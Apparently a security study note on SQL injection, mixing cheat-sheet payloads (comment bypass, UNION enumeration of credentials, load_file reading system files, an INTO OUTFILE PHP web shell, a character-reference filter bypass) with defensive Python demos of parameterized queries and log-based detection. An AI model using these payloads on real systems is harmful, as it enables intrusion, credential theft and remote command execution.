SQLi Exploits

References: Burp cheat sheet, Rana Khalil's video playlist, SQLi cheat sheet from Codingo

See Enumeration Section

Notes

The initial goal is to find an injectable location and, ideally, work out what the underlying query looks like. Test possible injection points with payloads such as:

  • '
  • ' --
  • ' OR 1=1
  • ' OR 1=1; -- -
  • 'UNION SELECT * FROM users WHERE 1=1; -- -
  • Note that -- starts a comment, so everything after it (including parts of the query you can't see) is dropped. If there is a further clause, like AND variable = 1, the query returns rows regardless of whether that variable is 1 or 0. Ex: username=administrator'--'&password=password123
    • The intended query is something like SELECT x FROM y WHERE username = 'administrator' AND password = 'password123'
    • The payload comments out the last part, so the query simply selects the administrator account, ignoring whether the password was correct.
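To make the comment-out bypass concrete from the defender's side, here is an added example (not from the original cheat sheet) that builds a throwaway SQLite users table and runs the same login query two ways: concatenated, as a vulnerable application would, and with bound parameters. The table, the function names and the sample credentials are all constructed for the demo.

```python
import sqlite3

# Constructed stand-in for the application's users table (in-memory SQLite, not a real schema).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("administrator", "S3cret!"), ("alice", "wonderland")])
    return conn

def login_vulnerable(conn, username, password):
    # The inputs are pasted into the SQL text, so a quote closes the literal and
    # '--' turns the rest of the statement (the password check) into a comment.
    query = ("SELECT username FROM users WHERE username = '" + username
             + "' AND password = '" + password + "'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None

def login_parameterized(conn, username, password):
    # Placeholders are bound as data: the whole string "administrator'--" is compared
    # against the column value and never reaches the SQL parser as syntax.
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(query, (username, password)).fetchone()
    return row[0] if row else None

def run_cases():
    # Returns {case: (result of vulnerable login, result of parameterized login)}.
    conn = make_db()
    cases = {
        "comment_bypass": ("administrator'--", "password123"),
        "or_true_bypass": ("' OR 1=1--", "anything"),
        "wrong_password": ("administrator", "password123"),
        "correct_password": ("administrator", "S3cret!"),
    }
    return {name: (login_vulnerable(conn, u, p), login_parameterized(conn, u, p))
            for name, (u, p) in cases.items()}

if __name__ == "__main__":
    for name, (vuln, safe) in run_cases().items():
        print(f"{name:18s} vulnerable -> {vuln!r:18s} parameterized -> {safe!r}")
```

The concatenated version logs in as administrator for both bypass payloads, while the parameterized version only succeeds for the genuine password; the fix is the placeholder, not input filtering.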

UNION SQLi

UNION SELECT - appends the results of a second query (against a table of your choosing) to the results of the intended query

Determine Number of Columns:

  1. $validQuery ORDER BY 1
  2. $validQuery ORDER BY 2
  3. and so on until the query errors; the last working number is the column count, and you can then form a UNION statement with that many columns to chain a second query and see how the data is displayed.

Start with UNION ALL SELECT 1, 2, X. From the output you can determine which column has the most space, making room for longer commands/exploits. The commands below are based on MariaDB; other databases might differ. Enumeration examples:

  • UNION ALL SELECT 1, 2, @@version
  • UNION ALL SELECT 1, 2, user()
  • UNION ALL SELECT 1, 2, table_name FROM information_schema.tables - this grabs the table names, like "users" below
    • Then you can use the table name (users) to reveal its columns: UNION ALL SELECT 1, 2, column_name FROM information_schema.columns WHERE table_name='users'
    • Then you can reveal other info from those columns: UNION ALL SELECT 1, username, password FROM users
  • UNION ALL SELECT 1, 2, load_file('C:/Windows/System32/drivers/etc/hosts') - load_file reads a file from the database server's filesystem (the hosts file here is just a test). Writing a file to the web root, as in the next item, is what turns this into code execution:
  • UNION ALL SELECT 1, 2, "<?php echo shell_exec($_GET['cmd']);?>" INTO OUTFILE 'c:/xampp/htdocs/backdoor.php' - uses INTO OUTFILE to write the code to a file on the server.
    • This might return an error, but you can test it with the previous command (load_file) and see whether the file was created.
    • Or you can just try running it at $Host/backdoor.php?cmd=$cmd
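The column-counting and enumeration steps above leave a recognisable trail in web-server logs. As an added example (not from the original cheat sheet), the following detector parses constructed Apache-style access log lines, URL-decodes the query parameters, and flags a client that walks ORDER BY 1, 2, 3 ... in sequence, issues UNION SELECT, touches information_schema or @@version, or calls load_file / INTO OUTFILE. The log lines, IP addresses, tag names and thresholds are all assumptions made for the demo.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access log (not real traffic): 10.0.0.5 runs the ORDER BY / UNION sequence,
# 10.0.0.9 browses normally, including a benign search for "order by date".
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /item.php?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /item.php?id=1%20ORDER%20BY%201 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /item.php?id=1%20ORDER%20BY%202 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /item.php?id=1%20ORDER%20BY%203 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /item.php?id=1%20ORDER%20BY%204 HTTP/1.1" 500 0
10.0.0.5 - - [01/Jan/2024:10:00:06 +0000] "GET /item.php?id=1%20UNION%20ALL%20SELECT%201,2,@@version HTTP/1.1" 200 640
10.0.0.5 - - [01/Jan/2024:10:00:07 +0000] "GET /item.php?id=1%20UNION%20ALL%20SELECT%201,2,table_name%20FROM%20information_schema.tables HTTP/1.1" 200 2048
10.0.0.5 - - [01/Jan/2024:10:00:08 +0000] "GET /item.php?id=1%20UNION%20ALL%20SELECT%201,2,load_file('C:/Windows/System32/drivers/etc/hosts') HTTP/1.1" 200 700
10.0.0.9 - - [01/Jan/2024:10:00:09 +0000] "GET /item.php?id=42 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:10 +0000] "GET /search.php?q=order+by+date HTTP/1.1" 200 512
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Signatures are matched against the *decoded* parameter values, never the raw URL.
SIGNATURES = {
    "union_select": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\.|@@version|\buser\s*\(", re.I),
    "file_access": re.compile(r"\bload_file\s*\(|\binto\s+(?:out|dump)file\b", re.I),
}
# Only ORDER BY followed by an integer counts: "ORDER BY date" in a search box is not a probe.
ORDER_BY_RE = re.compile(r"\bORDER\s+BY\s+(\d+)\b", re.I)

def _longest_consecutive_run(values):
    # Length of the longest run of n, n+1, n+2, ... in the order the requests arrived.
    run = best = 0
    prev = None
    for v in values:
        run = run + 1 if prev is not None and v == prev + 1 else 1
        best = max(best, run)
        prev = v
    return best

def analyze(log_text, probe_threshold=3):
    # Returns {ip: {"tags": [...], "column_probe_max": int, "server_errors": int}}
    # for every client that triggered at least one signal.
    per_ip = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, target, status = m["ip"], m["target"], int(m["status"])
        params = parse_qsl(urlsplit(target).query, keep_blank_values=True)
        decoded = " ".join(value for _, value in params)
        rec = per_ip.setdefault(ip, {"order_by": [], "tags": set(), "errors": 0})
        rec["order_by"].extend(int(n) for n in ORDER_BY_RE.findall(decoded))
        for tag, rx in SIGNATURES.items():
            if rx.search(decoded):
                rec["tags"].add(tag)
        if status >= 500:
            rec["errors"] += 1
    findings = {}
    for ip, rec in per_ip.items():
        tags = set(rec["tags"])
        if _longest_consecutive_run(rec["order_by"]) >= probe_threshold:
            tags.add("column_count_probe")
        if tags:
            findings[ip] = {"tags": sorted(tags),
                            "column_probe_max": max(rec["order_by"], default=0),
                            "server_errors": rec["errors"]}
    return findings

if __name__ == "__main__":
    for ip, info in analyze(SAMPLE_LOG).items():
        print(ip, info)
```

The 500 on the fourth ORDER BY is the error the attacker is looking for, so pairing the probe run with a server-error count gives the responder both the column count the attacker learned and the request where the application leaked it. Decoding the parameters first matters: the same signatures applied to the raw URL would miss anything percent-encoded.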

Filter bypass

XML encoding

Use &#x53;ELECT instead of SELECT to bypass a filter that blocks prohibited keywords

  • The XML character reference is decoded server-side (by the XML parser) before the value is passed to the SQL interpreter, so the filter sees &#x53;ELECT while the database sees SELECT
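The reason this bypass works is a layering mismatch: the keyword filter inspects the request body, the database receives the parser's output. The added example below (not from the original cheat sheet) shows a constructed XML stock-check request in which both UNION and SELECT are written as character references, a naive filter that regex-matches the raw body, and the same filter applied after the body has been parsed the way the application would parse it. The element names, the keyword list and the function names are assumptions for the demo.

```python
import re
import xml.etree.ElementTree as ET

KEYWORD_RE = re.compile(r"\b(SELECT|UNION|INSERT|UPDATE|DELETE|DROP)\b", re.I)

# Constructed request bodies. &#x55; is 'U' and &#x53; is 'S'; the XML parser restores
# them before the application ever sees the value, so the raw text never contains the keyword.
ENCODED_BODY = ("<stockCheck>"
                "<productId>1 &#x55;NION &#x53;ELECT 1,2,@@version</productId>"
                "<storeId>1</storeId></stockCheck>")
BENIGN_BODY = "<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>"

def raw_body_filter(body):
    # What a filter in front of the application sees: the undecoded bytes.
    return bool(KEYWORD_RE.search(body))

def decoded_values(body):
    # What the application sees: element text after the parser has resolved character references.
    # (For untrusted XML in production, parse with defusedxml rather than bare ElementTree.)
    root = ET.fromstring(body)
    return [elem.text for elem in root.iter() if elem.text]

def decoded_value_filter(body):
    # Same keyword check, applied at the layer where the value is actually interpreted.
    return any(KEYWORD_RE.search(value) for value in decoded_values(body))

def compare(body):
    return {"raw": raw_body_filter(body), "decoded": decoded_value_filter(body)}

if __name__ == "__main__":
    print("encoded body :", compare(ENCODED_BODY), decoded_values(ENCODED_BODY))
    print("benign body  :", compare(BENIGN_BODY))
```

The raw check passes the encoded body and the decoded check catches it, which is the general lesson: whatever inspection is done has to run on the same representation the query is built from, and a keyword blocklist is at best a detection aid, not a substitute for parameterized queries.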